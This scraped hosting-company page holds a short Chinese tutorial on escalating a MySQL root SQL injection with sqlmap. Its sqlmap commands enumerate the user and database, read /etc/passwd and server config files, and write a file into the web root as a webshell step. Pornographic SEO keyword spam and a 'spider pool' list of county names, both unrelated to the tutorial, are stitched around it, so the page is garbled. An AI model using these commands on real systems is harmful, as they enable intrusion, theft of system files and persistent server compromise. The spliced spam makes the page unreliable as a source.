欧美一区2区三区4区公司二百,国产精品婷婷午夜在线观看,自拍偷拍亚洲精品,国产美女诱惑一区二区

歡迎來(lái)到云服務(wù)器

網(wǎng)絡(luò)技術(shù)

sqlmap注入mysql和到root權(quán)限后怎么樣深入

 碰著一mysql root權(quán)限注入點(diǎn),實(shí)驗(yàn)用sqlmap進(jìn)一步滲透獲取更高權(quán)限,東亞服務(wù)器 臺(tái)灣服務(wù)器,詳細(xì)如下:

判定注入點(diǎn)的當(dāng)前用戶和當(dāng)前數(shù)據(jù)庫(kù)

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-db

 

root權(quán)限注入點(diǎn)可以實(shí)驗(yàn)讀取系統(tǒng)文件,好比/etc/passwd,以及apache,nginx的設(shè)置文件等,相關(guān)設(shè)置文件路徑如下:

nginx: usr/local/nginx/conf/nginx.conf

 

常用的apache設(shè)置文件路徑有:

/etc/httpd/conf/httpd.conf

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

 

sqlmap讀取文件語(yǔ)法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-read "/etc/passwd"

假如magic_quotes_gpc=off就可以實(shí)驗(yàn)舉辦寫(xiě)入Webshell,sqlmap寫(xiě)入文件語(yǔ)法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-write /test/test.txt --file-dest /var/www/html/1.txt

將當(dāng)?shù)氐膖est.txt寫(xiě)入到站點(diǎn)處事器的html目次下。

騰訊云代理

Copyright © 2003-2021 MFISP.COM. 國(guó)外vps服務(wù)器租用 夢(mèng)飛云服務(wù)器租用 版權(quán)所有 ? 粵ICP備11019662號(hào)

主站蜘蛛池模板: 烟台市| 陈巴尔虎旗| 石门县| 平谷区| 化州市| 石家庄市| 盱眙县| 巫溪县| 桑日县| 凌海市| 湖北省| 姚安县| 黄山市| 临清市| 凌云县| 广水市| 沅陵县| 巨野县| 安平县| 台前县| 淮阳县| 灵丘县| 五家渠市| 永仁县| 永济市| 中宁县| 钟山县| 府谷县| 永顺县| 瑞丽市| 昌图县| 临湘市| 灵武市| 怀远县| 江孜县| 雷波县| 阳泉市| 浦北县| 黄梅县| 株洲市| 木兰县|